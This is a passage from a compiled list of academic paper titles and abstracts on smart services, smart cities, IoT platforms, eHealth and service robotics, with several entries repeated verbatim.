knowledge based analysis on social network and business network evolution to facilitate collaborative development of digital services. This research aims to develop an ontology-guided analysis of networking to facilitate the formation of the innovation network to create new digital services. Central to the research is a dynamic ontology construct that could articulate the evolution of the social and business networks driven by the prospects of value creation with networking structure and routines contributing to recognizing, engaging, and mobilizing key actors and resources. Based on a prototype model and a series of case studies of the emerging knowledge-intensive service industries, this research explores the potential of the model in adapting to the heterogeneity of the service demands and collaboration mechanisms in the service network. Through in-depth model-based analysis and synthesis of the emerging digital service activities, this research expects to develop an ontology-based platform for knowledge creation and network management system to capture the extensive opportunities for value creation in participative webs of services on experience economics. --- paper_title: Towards Personalized Smart City Guide Services in Future Internet Environments paper_content: The FI-CONTENT project aims at establishing the foundation of a European infrastructure for developing and testing novel smart city services. The Smart City Services Platform will develop enabling technology for SMEs and developer to create services offering residents and visitors to cities smart services that enhance their city visit or daily life. We have made use of generic, specific and common enablers to develop a reference implementation, the Smart City Guide web app. The basic information is provided by the Open City Database, an open source specific enabler that can be used for any city in Europe. Recommendation as a Service is an enabler that can be applied to lots use cases, here we describe how we integrated it into the Smart City Guide. The uses cases will be iteratively improved and upgraded during regular iterative cycles based on feedback gained in lab and field trials at the experimentation sites. As the app is transferable to any city, it will be tested at a number of experimentation sites. --- paper_title: MoSS: Mobile Smart Services for ubiquitous network management paper_content: We present an intelligence-based mobile solution addressing product life cycle and overall network management functions. Traditional network and service management systems rely on basic inventory information periodically collected from the network in order to establish the basic “Install Base” network view. Such collection systems, however, still require manual human manipulations given the required device's electronically embedded predefined parameters are often inaccurate or absent. Leveraging mobile agents and ubiquitous computing in networks, we developed the Mobile Smart Services (MoSS), a location-aware solution as well as a novel interactive interface to improve the collected parameters and Return Material Authorization (RMA) user experience. The fluid interaction, mobility, and efficiency of the system allow network service providers and customers to solve network management problems. The applications developed also enable ubiquitous inventory management, intelligent contract management and effective system diagnosis to improve productivity in complicated network systems. --- paper_title: Toward the construction knowledge economy : The e-cognos project paper_content: The paper focuses upon the contribution that knowledge management portals can make to the enhancement, development and improvement of professional expertise in the Construction domain. The paper is based on the e-COGNOS project1 which aims at specifying and developing an open ::: model-based infrastructure and a set of tools that promote consistent knowledge management within collaborative construction environments. The specified solution emerged from a comprehensive analysis of the business and information / knowledge management practices of the project end-users. The system architect uses a Construction specific ontology as a basis for specifying adaptive ::: mechanisms that can organise documents according to their contents and interdependencies, while maintaining their overall consistency. e-COGNOS has a web-based infrastructure will include services allowing to create, capture, index, retrieve and disseminate knowledge. It also promotes the integration of third-party services, including proprietary tools. The e-COGNOS approach will be tested and evaluated through a series of field trials. This will be followed by the delivery of business recommendations regarding the deployment of e-COGNOS in the construction sector. The research is ongoing and supported by the European Commission under the IST programme – Key Action II --- paper_title: Prototyping Smart City applications over large scale M2M testbed paper_content: Many cities around the globe are adopting the use of Information and Communication Technology (ICT) as part of a strategy to transform into Smart Cities. These will allow cities in the developing world to cope with the ever increasing demand for services such as an effective electricity supply, healthcare and water management. Machine-to-Machine (M2M) communication standards play a vital role in enabling the development of Smart Cities by supporting new innovative services. Although Smart City services offer an exciting future, many challenges still have to be addressed in order to allow for mainstream adoption. This work focuses on issues related to prototyping Smart City services that utilize standardised M2M middleware platforms. In addition, the use of an inter-continental testbed for Smart City applications as an enabler for innovative, automated and interactive services is presented. The services developed will use an architecture which is based on the Smart City framework developed as part of the Testbeds for Reliable Smart City Machine-to-Machine Communication (TRESCIMO) project. These services will also serve as means to validate the use of Smart services within an African City's context. In addition, the architecture is validated by taking into account various real world use cases for Smart City applications. --- paper_title: Smart servitization within the context of industrial user–supplier relationships: contingencies according to a machine tool manufacturer paper_content: Advanced manufacturing technologies (AMT) have been hailed as enablers to make industrial products and operations smart. The present paper argues that AMT can not only form a lever for developing smart goods and smart production environments, but can likewise form a basis to offer smart services and to propose servitized earning or payment models to industrial users. We do so on the basis of a literature review, followed by a case-based analysis of the AMT and servitization challenges to which a machine tool manufacturer is exposed in its industrial market environment. Consequently, the present study identifies a set of contingencies c.q. catalyzers with regard to seizing AMT for smart servitization practices within industrial business-to-business contexts. These are: the ability to capture relevant data; to exploit such data adequately and convert them into actionable knowledge; and to build trust among users and producers of capital goods in order to come to effective data exchange. We finish by deriving implications for smart servitization in a manufacturing context, and by outlining case-based lessons on how AMT and servitization can further interactive design and manufacturing practices in an industrial producer-user setting. We contend that there may be a gap between the technological and organizational readiness of (many) machine tool companies for smart servitization, on the one hand, and what different publications on AMT and Industry 4.0 are trying to make out. We also find that besides the high-tech and big data components to smart servitization, companies with an ambition in this field should take into account minimum/right information principles, to actually get to deep learning, and to establish a culture of trust with business partners, and inside implicated organizations among departments to create an environment in which smart servitized user-supplier relationships can prosper. --- paper_title: Framework design for distributed service robotic systems paper_content: Service robot is one of the most promising industries in the future. Modular framework for designing and implementing a distributed service robot system including robot and intelligent environment is proposed. Components as sensors and actuators of a robotic system are standardized in both hardware and software design, resulting in an abstraction of digital smart devices with certain functions. A unified software platform with a core of Service-Oriented Architecture (SOA) middleware is established for the system. It employs the Player toolkit to access smart devices via drivers and interfaces, and the Web Service technology is introduced for automatic collaboration of smart services according to their functions. An implementation of a home-care service robotic system is described with 2D/3D realistic simulation. Experimental results validate the flexibility and open performance of the proposed demo system. --- paper_title: Contrasting risk perceptions of technology-based service innovations in inter-organizational settings paper_content: Despite the rapid growth and potential of technology-based services, managers' greatest challenges are gaining customer acceptance and increasing usage of these new innovative services. In the B2C field, studies of self-service technology show that perceived risk is an important factor influencing the use of service technology. Though prior research explores different risk types that emerge in consumer settings, risk perception in the B2B setting lacks a detailed examination of different risk types influencing technology-based service adoption. Data from 49 qualitative interviews with providers and customers in two different B2B industries inform this study. The findings emphasize the importance of functional and financial risks in a B2B context and show that business customers' personal and psychological fears hinder their use of technology-based services. Results highlight differences in risk perception and evaluation between customers and providers. --- paper_title: A Smart Hospital Information System for Mental Disorders paper_content: This study aims to build a smart hospital information framework to deal with various medical information. First, a ubiquitous smart hospital information system model under WaaS (Wisdom as a Service) architecture is proposed. With this model, medical information can be organized into different levels. In this model, novel methods of organizing medical information (offline computing) and smart services delivering (online computing) are defined. The methods are used to supply medical knowledge recommendation services to patients according to their personalized condition and context. As a use case, a smart medical knowledge recommendation system, namely SKeWa, was built to reveal the usefulness of the model and the methods. --- paper_title: Applications of big data to smart cities paper_content: Many governments are considering adopting the smart city concept in their cities and implementing big data applications that support smart city components to reach the required level of sustainability and improve the living standards. Smart cities utilize multiple technologies to improve the performance of health, transportation, energy, education, and water services leading to higher levels of comfort of their citizens. This involves reducing costs and resource consumption in addition to more effectively and actively engaging with their citizens. One of the recent technologies that has a huge potential to enhance smart city services is big data analytics. As digitization has become an integral part of everyday life, data collection has resulted in the accumulation of huge amounts of data that can be used in various beneficial application domains. Effective analysis and utilization of big data is a key factor for success in many business and service domains, including the smart city domain. This paper reviews the applications of big data to support smart cities. It discusses and compares different definitions of the smart city and big data and explores the opportunities, challenges and benefits of incorporating big data applications for smart cities. In addition it attempts to identify the requirements that support the implementation of big data applications for smart city services. The review reveals that several opportunities are available for utilizing big data in smart cities; however, there are still many issues and challenges to be addressed to achieve better utilization of this technology. --- paper_title: Internet of Things for a Smart and Ubiquitous eHealth System paper_content: Connected data has always been considered as a primary source to knowledge. Internet of Things uses the virtue of connecting this data from different entities and creates a pool of knowledge for providing smart services to users, based on rigorous analysis and processing over the knowledge. The communication in this context scales to not only between machine to machine but also between a large number of heterogeneous entities and persons. This genius technology of Internet of Things holds paramount importance and application in healthcare technologies. Considering health technologies, a large number of devices generate huge amount of data related to a patient. Assimilating the data from heterogeneous sources and using it to generate intelligence is one of the primary tasks in a smart environment. In the context of eHealth, Internet of Things is of immense importance since connected data about patient would facilitate treatment with more efficiency and comprehensive knowledge. Virtually storing the patient data and making it ubiquitously accessible to concerned healthcare personnel would be the first step toward mutual knowledge sharing. Another important aspect of using this connected data is the design of an intelligent clinical decision support system which would assist the doctors in every possible way during the treatment phase. A model has been proposed with an inclusive approach of Internet of Things in eHealth scenario for a smart medical environment and providing ubiquitous services at its best. Several issues pertaining to the system has also been discussed accordingly. Nevertheless, the enormous spread of Internet of Things for efficient and intelligent healthcare services holds quite inevitable. Rather it adds to the foundation notion of ubiquitous services by making available to everyone and everywhere. The new age eHealth facilities are expected to enable end-to-end monitoring systems even at remote scenarios, helping medical services reach the unreached. --- paper_title: Scalable real-time monitoring system for ubiquitous smart space paper_content: Scalable real-time monitoring is one of important requirements to supply smart services for customers, on time, in ubiquitous smart space. We propose a scalable real-time monitoring method to aggregate large amounts of data from various sensor devices distributed over different domain areas. The real-time monitoring scheme can process data from sensor devices within deadline and is scalable based on the number of sensor devices. The scalability of monitoring can be improved by employing a hierarchical monitoring agent for sensor devices while still satisfying the data deadlines. Simulation results show that our real-time monitoring scheme can improve the met deadline ratio up to 27% compared to the previous schemes. --- paper_title: QoS based framework for ubiquitous robotic services composition paper_content: With the growing emergence of ubiquitous computing and networked systems, ubiquitous robotics is becoming an active research domain. The issue of services composition to offer seamless access to a variety of complex services has received widespread attention in recent years. The majority of the proposed approaches have been inspired from the research undertaken jointly on Workflow and AI-based classical planning techniques. However, the traditional AI-based methods assume that the environment is static and the invocation of the services is deterministic. In ubiquitous robotics, services composition is a challenging issue when the execution environment and services are dynamic and the knowledge about their state and context is uncertain. The services composition requires taking into account the parameters of quality of service (QoS) to adapt the composed service to context of the user and the environment, in particular, dealing with failures such as: service invocation failures, network disconnection, sensor failures, context change due to mobility of objects (robots, sensors, etc.), service discovery failures and service execution failures. In this paper, we present a framework which gives ubiquitous robotic system the ability to dynamically compose and deliver ubiquitous services, and to monitor their execution. The main motivation behind the use of services composition is to decrease time and costs to develop integrated complex applications using robots by transforming them from a single task issuer to smart services provider and human companion, without rebuilding each time the robotic system. To address these new challenges, we propose in this paper a new framework for services composition and monitoring, including QoS estimation and Bayesian learning model to deal with the dynamic and uncertain nature of the environment. This framework includes three levels: abstract plan construction, plan execution, and services discovery and re-composition. This approach is tested under USARSim simulator on a prototype of ubiquitous robotic services for assisting an elderly person at home. The obtained results from extensive tests demonstrate clearly the feasibility and efficiency of our approach. --- paper_title: Smart services for home automation. managing concurrency and failures: New wine in old bottles ? paper_content: Home automation represents a growing market in the industrialized world. Today's systems are mainly based on ad hoc and proprietary solution, with little to no interoperability and smart integration. However, in a not so distant future, devices installed in our home will be able to smartly interact and integrate in order to offer complex services with rich functionalities. Realizing this kind of integration push developers to increase the amount of abstraction within the software architecture. In this paper we give a high-level view of what are the inherent trade-offs that stem from this process of abstraction and suggest how they could be tackled in these complex home automation systems. More specifically we focus our analysis on two problems: concurrent execultion of multiple plans and failure detection. --- paper_title: Service-oriented networking platform on smart devices paper_content: This study presents the design of a service-oriented networking platform to offer dynamic networking services in support of mobile group communications among connected smart devices. This platform enables users to access smart services anywhere and anytime with embedded devices while satisfying their requirements of various smart services. The proposed platform adopts a session initiation protocol (SIP) protocol as service signalling protocol that provides high extensibility and compatibility with an existing service system. The overlay network structure suggested in our platform provides an advantage of building a scalable and dynamic service network based on multiple smart zones. Furthermore, the quality of end-to-end service in dynamic network environments is guaranteed by virtue of the smart delivery scheme in the platform. --- paper_title: Exploring Platform Adoption in the Smart Home Case paper_content: Smart home (SH) services promote the comfort, convenience, security, entertainment, healthcare, education and communication of people in their home environments. Despite radical enhancements envisioned to peoples’ lives, the SH market has remained a niche for more than three decades. Yet, recent fast-paced developments, including ubiquitous computing, miniaturization of microelectronic components and digitalization of societies, have spurred a new wave of interest in a field populated by various technology platforms battling for dominance. In this light, we explore the determinants for wide-spread adoption of SH platforms informed by 21 experts from 19 companies. Our qualitative content analysis identifies, classifies, ranks and describes 34 determinants and yields a theoretical model on SH platform adoption. As such, we provide a basis for further research on platform ecosystems and managerial implications on platform design and governance in the SH field. In particular, we highlight the technical and organizational openness and the legitimacy of sponsorship. --- paper_title: QoS based framework for ubiquitous robotic services composition paper_content: With the growing emergence of ubiquitous computing and networked systems, ubiquitous robotics is becoming an active research domain. The issue of services composition to offer seamless access to a variety of complex services has received widespread attention in recent years. The majority of the proposed approaches have been inspired from the research undertaken jointly on Workflow and AI-based classical planning techniques. However, the traditional AI-based methods assume that the environment is static and the invocation of the services is deterministic. In ubiquitous robotics, services composition is a challenging issue when the execution environment and services are dynamic and the knowledge about their state and context is uncertain. The services composition requires taking into account the parameters of quality of service (QoS) to adapt the composed service to context of the user and the environment, in particular, dealing with failures such as: service invocation failures, network disconnection, sensor failures, context change due to mobility of objects (robots, sensors, etc.), service discovery failures and service execution failures. In this paper, we present a framework which gives ubiquitous robotic system the ability to dynamically compose and deliver ubiquitous services, and to monitor their execution. The main motivation behind the use of services composition is to decrease time and costs to develop integrated complex applications using robots by transforming them from a single task issuer to smart services provider and human companion, without rebuilding each time the robotic system. To address these new challenges, we propose in this paper a new framework for services composition and monitoring, including QoS estimation and Bayesian learning model to deal with the dynamic and uncertain nature of the environment. This framework includes three levels: abstract plan construction, plan execution, and services discovery and re-composition. This approach is tested under USARSim simulator on a prototype of ubiquitous robotic services for assisting an elderly person at home. The obtained results from extensive tests demonstrate clearly the feasibility and efficiency of our approach. --- paper_title: Identifying enablers for future e-Services paper_content: The starting point of the project is the observation that new information and communication technologies (ICT) are often introduced without taking into account the requirements of elderly and/or disabled users, resulting in products and services that are hardly usable by those users. A method for identifying enablers for future e-Services is described. In short it identifies usability problems with future interation technologies and map these future interaction technologies to e-Services. The results of investigations using this method allow stakeholders in different stages of the research and development lifecycle e-Services to spot potential difficulties in the design of user interfaces which could cause elderly or disabled users to experience usability issues. --- paper_title: Knowledge Extraction and Reuse within "Smart" Service Centers paper_content: In this paper, we describe the initial version of a text analytics system under development and use at Cisco, where the objective is to "optimize" the productivity and effectiveness of the service center. More broadly, we discuss the practical needs in industry for developing powerful "Smart" Service Centers and the gaps in research to meet these needs. Ideally, service engineers in service centers should be utilized to handle issues which have not been solved previously and machines should be used to solve problems already solved, or at least help the service engineers obtain pertinent information from related and solved service cases when responding to a new request. Such a role for a machine would be a core element of the "Smart Services" offering. Hence, design of a highly efficient human-machine combination to derive insights from text and respond to a user request, is critical and fundamental, this enables service agents to capture relevant information quickly and accurately, and to develop the foundation for upper layer applications. Despite extensive earlier literature, the optimization for service process that involves very long, unstructured documents referencing a number of technology and product related terms with implicit inter-relationships has not been fully investigated. Our approach enables firms such as Cisco to achieve efficient service delivery by automating knowledge extraction to support "Self Service" by end users. The Cisco text analytics system termed Service Request Analyzer and Recommender (SRAR) addresses gaps in the Support Services function, by optimizing the use of human resources and software analytics in the service delivery process. The Analyzer is able to handle complex service requests (SRs) and to present categorized and pertinent information to service agents, based on which the Recommender, an upper layer application, is built to retrieve similar solved SRs, when presented with a new request. Our contributions in the context of text analysis and system design are three-fold. First, we identify the elements of the diagnostic process underlying the creation of SRs, and design a hierarchical classifier to decompose the complex SRs into those elements. Such decomposition provides specific information from the functional perspectives about "What was the problem?" "Why did it occur?" and "How was it solved?" which assists service agents in acquiring the knowledge they need more effectively and rapidly. Second, we build an SR Recommender on top of SR Analyzer to extend the system functionality for improved knowledge reuse, to measure SR similarity for more accurate recommendation of SRs. Third, we validate our SRAR in an initial pilot study in the service center for Cisco network diagnostics and support, and demonstrate the effectiveness and extensibility of our system. Our system appears applicable to the service centers across multiple domains, including networks, aerospace, semiconductors, automotive, health care, and financial services, and potentially adapted and expanded to all the other business functions of an enterprise. We conclude by indicating open research problems and new research directions, to expand the set of problems that need to be addressed in developing a Smart Support Services capability, and the solutions required to achieve them. These include the capture, retrieval, and reuse of more refined, structured and granulated knowledge, as well as the use of forum threads and semi-automated, dynamic categorization, together with considerations of the optimal use of humans and machine learning based software. Other aspects we discuss include recommendation systems based on temporal pattern clustering and incentives for experts to permit their expertise to be captured for machine (re-)use. --- paper_title: Global Sensor Modeling and Constrained Application Methods Enabling Cloud-Based Open Space Smart Services paper_content: The deployment and provisioning of intelligent systems and utility-based services will greatly benefit from a cloud-based intelligent middleware framework, which could be deployed over multiple infrastructure providers (such as smart cities, hospitals, campus and private enterprises, offices, etc.) in order to deliver on-demand access to smart services. This paper introduces the formulation of an open source integrated intelligent platform as solution for integrating global sensor networks, providing design principles for cloud-based intelligent environments and discuss infrastructure functional modules and their implementation. This paper review briefly technologies enabling the framework, towards emphasizes on demand establishment of smart cities services based on the automated formulation of ubiquitous intelligence of Internet connected objects. The framework introduced founds on the GSN infrastructure. The framework leverages W3C SSN-XG formal language and the IETF COAP protocol, providing support for enabling intelligent (sensors-objects) services. The service requirements for particular smart city scenario are introduced and initial implementations and results from performed simulations studied and discussed. --- paper_title: Cloud semantic-based dynamic multimodal platform for building mhealth context-aware services paper_content: Currently, everybody wish to access to applications from a wide variety of devices (PC, Tablet, Smartphone, Set-top-box, etc.) in situations including various interactions and modalities (mouse, tactile screen, voice, gesture detection, etc.). At home, users interact with many devices and get access to many multimedia oriented documents (hosted on local drives, on cloud storage, online streaming, etc.) in various situations with multiple (and sometimes at the same time) devices. The diversity and heterogeneity of users profiles and service sources can be a barrier to discover the available services sources that can come from anywhere from the home or the city. The objective of this paper is to suggest a meta-level architecture for increasing the high level of context concepts abstracting for heterogeneous profiles and service sources via a top-level ontology. We particularly focus on context-aware mHealth applications and propose an ontologies-based architecture, OntoSmart (a top-ONTOlogy SMART), which provides adapted services that help users to broadcast of multimedia documents and their use with interactive services in order to help in maintaining old people at home and achieving their preferences. In order to validate our proposal, we have used Semantic Web, Cloud and Middlewares by specifying and matching OWL profiles and experiment their usage on several platforms. --- paper_title: Prototyping Smart City applications over large scale M2M testbed paper_content: Many cities around the globe are adopting the use of Information and Communication Technology (ICT) as part of a strategy to transform into Smart Cities. These will allow cities in the developing world to cope with the ever increasing demand for services such as an effective electricity supply, healthcare and water management. Machine-to-Machine (M2M) communication standards play a vital role in enabling the development of Smart Cities by supporting new innovative services. Although Smart City services offer an exciting future, many challenges still have to be addressed in order to allow for mainstream adoption. This work focuses on issues related to prototyping Smart City services that utilize standardised M2M middleware platforms. In addition, the use of an inter-continental testbed for Smart City applications as an enabler for innovative, automated and interactive services is presented. The services developed will use an architecture which is based on the Smart City framework developed as part of the Testbeds for Reliable Smart City Machine-to-Machine Communication (TRESCIMO) project. These services will also serve as means to validate the use of Smart services within an African City's context. In addition, the architecture is validated by taking into account various real world use cases for Smart City applications. --- paper_title: Framework design for distributed service robotic systems paper_content: Service robot is one of the most promising industries in the future. Modular framework for designing and implementing a distributed service robot system including robot and intelligent environment is proposed. Components as sensors and actuators of a robotic system are standardized in both hardware and software design, resulting in an abstraction of digital smart devices with certain functions. A unified software platform with a core of Service-Oriented Architecture (SOA) middleware is established for the system. It employs the Player toolkit to access smart devices via drivers and interfaces, and the Web Service technology is introduced for automatic collaboration of smart services according to their functions. An implementation of a home-care service robotic system is described with 2D/3D realistic simulation. Experimental results validate the flexibility and open performance of the proposed demo system. --- paper_title: Towards Smart Service Networks: An Interdisciplinary Service Assessment Metrics paper_content: Service Networks (SNs) are open systems accommodating the co-production of new knowledge and services through organic peer-to-peer interactions. Key to broad success of SNs in practice is their ability to foster and ensure a high performance. By performance we mean the joint effort of tremendous interdisciplinary collaboration, cooperation and coordination among the network participants. However, due to the heterogeneous background of such participants (i.e., business, technical, etc.), different interpretations of the shared terminology are likely to happen. Thus, confusion may appear in the multi-disciplinary communication of SNs participants which in turn may lead to performance anomalies. To deal with such a problem, we propose a novel framework of bi-dimensional (business vs technical) performance metric indicators built on the basis of a systems thinking mindset. By using our framework, a holistic picture of the multiple dimensions and structure of SNs is provided, so that the interdisciplinary service participants have a correct understanding of the service scope and required resources in operation. Moreover, and most importantly, it provides a way to examine the performance traceability of the services within a SN. --- paper_title: A Socio-Technical Approach to Study Consumer-Centric Information Systems. paper_content: Given the unprecedented role of digital service platforms in private life, this research sets out to identify the mechanisms that are designed into information systems with the purpose to increase consumer centricity. We evaluate the consumer centricity of an information system against three reflective indicators, that is the degree of need orientation, value co-creation and relationship orientation and conceptualize consumer centricity as the ability to align social and technical information system components. ::: We employ a positivist, explanatory case study approach to test three hypotheses on system component alignment in cases from three domains (gaming, social networking, and video sharing). We found preliminary evidence for three alignment mechanisms that increase consumer centricity. ::: With this research, we plan to contribute to the literature on consumer-centric information systems by elaborating and empirically grounding a socio-technical approach to study mechanisms and their joint application to increase consumer centricity in information systems. --- paper_title: Adaptive blurring of sensor data to balance privacy and utility for ubiquitous services paper_content: Given the trend towards mobile computing, the next generation of ubiquitous "smart" services will have to continuously analyze surrounding sensor data. More than ever, such services will rely on data potentially related to personal activities to perform their tasks, e.g. to predict urban traffic or local weather conditions. However, revealing personal data inevitably entails privacy risks, especially when data is shared with high precision and frequency. For example, by analyzing the precise electric consumption data, it can be inferred if a person is currently at home, however this can empower new services such as a smart heating system. Access control (forbid or grant access) or anonymization techniques are not able to deal with such trade-off because whether they completely prohibit access to data or lose source traceability. Blurring techniques, by tuning data quality, offer a wide range of trade-offs between privacy and utility for services. However, the amount of ubiquitous services and their data quality requirements lead to an explosion of possible configurations of blurring algorithms. To manage this complexity, in this paper we propose a platform that automatically adapts (at runtime) blurring components between data owners and data consumers (services). The platform searches the optimal trade-off between service utility and privacy risks using multi-objective evolutionary algorithms to adapt the underlying communication platform. We evaluate our approach on a sensor network gateway and show its suitability in terms of i) effectiveness to find an appropriate solution, ii) efficiency and scalability. --- paper_title: The next industrial revolution: Integrated services and goods paper_content: The outputs or products of an economy can be divided into services products and goods products (due to manufacturing, construction, agriculture and mining). To date, the services and goods products have, for the most part, been separately mass produced. However, in contrast to the first and second industrial revolutions which respectively focused on the development and the mass production of goods, the next — or third — industrial revolution is focused on the integration of services and/or goods; it is beginning in this second decade of the 21st Century. The Third Industrial Revolution (TIR) is based on the confluence of three major technological enablers (i.e., big data analytics, adaptive services and digital manufacturing); they underpin the integration or mass customization of services and/or goods. As detailed in an earlier paper, we regard mass customization as the simultaneous and real-time management of supply and demand chains, based on a taxonomy that can be defined in terms of its underpinning component and management foci. The benefits of real-time mass customization cannot be over-stated as goods and services become indistinguishable and are co-produced — as “servgoods” — in real-time, resulting in an overwhelming economic advantage to the industrialized countries where the consuming customers are at the same time the co-producing producers. --- paper_title: Design of emerging digital services: a taxonomy paper_content: There has been a gigantic shift from a product based economy to one based on services, specifically digital services. From every indication it is likely to be more than a passing fad and the changes these emerging digital services represent will continue to transform commerce and have yet to reach market saturation. Digital services are being designed for and offered to users, yet very little is known about the design process that goes behind these developments. Is there a science behind designing digital services? By examining 12 leading digital services, we have developed a design taxonomy to be able to classify and contrast digital services. What emerged in the taxonomy were two broad dimensions; a set of fundamental design objectives and a set of fundamental service provider objectives. This paper concludes with an application of the proposed taxonomy to three leading digital services. We hope that the proposed taxonomy will be useful in understanding the science behind the design of digital services. --- paper_title: Strategies in Smart Service Systems Enabled Multi-sided Markets: Business Models for the Internet of Things paper_content: Internet of Things has the potential to disrupt industries through changing products, services, and business models just as the Internet did in the '90s. Machine-to-machine communication is at the core of Internet of Things. Machines that we interact with in everyday life will start interacting with each other, collect data, and even use advances in data technologies to make decisions for us. Organizations, in order to achieve the highest profit, should also redesign their business service models conscientiously around externalities across markets that link through platforms and be specific about which markets to serve. In this research, we aim to build business ownership strategies to further two-sided markets and platforms literature. Herein, we focus on a number of business service models that link four sides of a market, and compare the advantages and disadvantages of network externalities generated by Internet of Things in each model. --- paper_title: Global Sensor Modeling and Constrained Application Methods Enabling Cloud-Based Open Space Smart Services paper_content: The deployment and provisioning of intelligent systems and utility-based services will greatly benefit from a cloud-based intelligent middleware framework, which could be deployed over multiple infrastructure providers (such as smart cities, hospitals, campus and private enterprises, offices, etc.) in order to deliver on-demand access to smart services. This paper introduces the formulation of an open source integrated intelligent platform as solution for integrating global sensor networks, providing design principles for cloud-based intelligent environments and discuss infrastructure functional modules and their implementation. This paper review briefly technologies enabling the framework, towards emphasizes on demand establishment of smart cities services based on the automated formulation of ubiquitous intelligence of Internet connected objects. The framework introduced founds on the GSN infrastructure. The framework leverages W3C SSN-XG formal language and the IETF COAP protocol, providing support for enabling intelligent (sensors-objects) services. The service requirements for particular smart city scenario are introduced and initial implementations and results from performed simulations studied and discussed. --- paper_title: Integration of wireless and data technologies for personalized smart applications paper_content: Wireless radio-based communication technologies have drastically evolved over the past decades to deliver lower cost, higher efficiency, enhanced quality of experience and diversified smart services (e.g., ambient assisted living, smart grid, e-health). The future development of these technologies faces multi-fold challenges, which are determined by the complexity of the myriad of emerging user and usage scenarios, the scarcity of radio spectrum (licensed and unlicensed), and the quest for user-friendly, data-intensive and security-sensitive technology and applications. This paper outlines the challenges and trends around the integration and development of smart wireless and data technologies, also in relation to standardization. Further, this integration is studied for a specific e-Health scenario in terms of application and usage requirements, involved technologies and required enablers and standardization needs. --- paper_title: Implementation of smart home service over web of object architecture paper_content: Internet is an optimal place to human as a producer or a consumer for sharing information until now. In the future, not only the human-generated information but also things will be connected into internet and these will evolve into internet of things(IoT) which can share the information thing-in-itself and its environment. This paper proposes service platform which provides web base IoT services and supports service orchestration and composition with device objectification and describes implementation results of smart home service with things over web of object architecture. --- paper_title: The identification of new service opportunities: a case-based morphological analysis paper_content: Abstract Typically, firms try to differentiate their products through the integration of innovative services. For this reason, much recent research into new service development has focused on methods of identifying and generating new service ideas. The most prevalent method for generating a new service is a morphological analysis that decomposes a system into several dimensions and values, and then recombines those values to generate new services. Despite the popularity of morphological analysis, how to build morphological matrix has been an area of subjective expert judgment. In this paper, we focused on the possibility to utilize the big data to the morphological analysis to address the subjective morphological building process, by suggesting a case-based morphological analysis. By employing case-based reasoning and network analysis, firms can easily identify direct and indirect clues for the new services and integrate these results to the morphological building processes. To support this approach, this study first employs a case-based reasoning strategy to collect and identify similar services, and then assesses the patterns in those services through network analysis. By engaging in network analysis, firms can identify key aspects of new services, and determine what kinds of keywords or aspects should be employed for the dimensions and values of morphological matrices. --- paper_title: Interoperable eHealth platform for personalized smart services paper_content: Independent living is one of the main challenges linked to an increasing ageing population and concerns both patients and healthy elderlies. A lot of research has focused on the area of ambient-assisted living (AAL) technologies towards an intelligent caring home environment able to offer personalized context-aware applications to serve the user's needs. This paper proposes the use of advised sensing, context-aware and cloud-based lifestyle reasoning to design an innovative eHealth platform that supports highly personalized smart services to primary users. The architecture of the platform has been designed in accordance with the interoperability requirements and standards as proposed by ITU-T and Continua Alliance. In particular, we define the interface dependencies and functional requirements needed, to allow eCare and eHealth vendors to manufacture interoperable sensors, ambient and home networks, telehealth platforms, health support applications and software services. Finally, data mining techniques in relation to the proposed architecture are also proposed to enhance the overall AAL experience of the users. --- paper_title: Cloud semantic-based dynamic multimodal platform for building mhealth context-aware services paper_content: Currently, everybody wish to access to applications from a wide variety of devices (PC, Tablet, Smartphone, Set-top-box, etc.) in situations including various interactions and modalities (mouse, tactile screen, voice, gesture detection, etc.). At home, users interact with many devices and get access to many multimedia oriented documents (hosted on local drives, on cloud storage, online streaming, etc.) in various situations with multiple (and sometimes at the same time) devices. The diversity and heterogeneity of users profiles and service sources can be a barrier to discover the available services sources that can come from anywhere from the home or the city. The objective of this paper is to suggest a meta-level architecture for increasing the high level of context concepts abstracting for heterogeneous profiles and service sources via a top-level ontology. We particularly focus on context-aware mHealth applications and propose an ontologies-based architecture, OntoSmart (a top-ONTOlogy SMART), which provides adapted services that help users to broadcast of multimedia documents and their use with interactive services in order to help in maintaining old people at home and achieving their preferences. In order to validate our proposal, we have used Semantic Web, Cloud and Middlewares by specifying and matching OWL profiles and experiment their usage on several platforms. --- paper_title: A software framework for enabling smart services paper_content: ‘Smart’ becomes a buzzword in many sectors of the society. Among them, Smart Service is an emerging paradigm for delivering services with ‘smartness’ features. A key ingredient of smart services is various types of contexts including mobile and social contexts. With the advent of sensor technology and availability in mobile devices, contexts become a key source of information from which situations can be inferred. And, situation-specific services have a high potential of being smart services. However, a number of fundamental technical issues remain unresolved, especially in the area of software framework for developing and deploying smart services. In this paper, we present a software framework for context-aware smart life services, Smart Service Framework (SSF). We begin by defining smart services with key characteristics, and define our architectural design of the SSF. We also define a process for provisioning smart services. And, we specify guidelines and algorithms needed for carrying out the four activities in the process. --- paper_title: Scalable analysis of collective behaviour in smart service systems paper_content: The long term vision of smart service systems in which electronic environments are made sensitive and responsive to the presence of, possibly many, people is gradually taking shape through a number of pilot projects. The purposes of such systems vary from intelligent homes that assist their inhabitants to make their lives more independent and comfortable to much larger environments such as airports in which people are provided with context aware, personalised, adaptive and anticipatory services that are most relevant for them given their location and their current activities. This paper is concerned with the exploration of scalable formal models that can address the collective behaviour of a large number of people moving through a smart environment. --- paper_title: Digital assistance services for emergency situations in personalized mobile healthcare: Smart space based approach paper_content: Recent progress in technologies of the Internet of Things (IoT) enables advanced scenarios for mobile healthcare (m-Health). In this paper, we consider the service intelligence in m-Health (so called smart services). On the one hand, such a service utilizes the telemedicine approach when existing healthcare services (located in hospital) are delivered to remote patients (out of hospital). On the other hand, construction and delivery of a smart service benefit from additional intelligence attributes, beyond a fixed set of healthcare services of a given medical information system. For this promising class of m-Health services, we introduce reference scenarios of personalized assistance for a mobile patient with focus on emergency cases. Our development employs the smart spaces paradigm: patients, medical personnel, healthcare services, and other participants operate within a common networked computing environment and interact by sharing information and its semantics. We contribute design solutions to construct services as smart m-Health spaces. --- paper_title: Service-oriented networking platform on smart devices paper_content: This study presents the design of a service-oriented networking platform to offer dynamic networking services in support of mobile group communications among connected smart devices. This platform enables users to access smart services anywhere and anytime with embedded devices while satisfying their requirements of various smart services. The proposed platform adopts a session initiation protocol (SIP) protocol as service signalling protocol that provides high extensibility and compatibility with an existing service system. The overlay network structure suggested in our platform provides an advantage of building a scalable and dynamic service network based on multiple smart zones. Furthermore, the quality of end-to-end service in dynamic network environments is guaranteed by virtue of the smart delivery scheme in the platform. --- paper_title: Scalable real-time monitoring system for 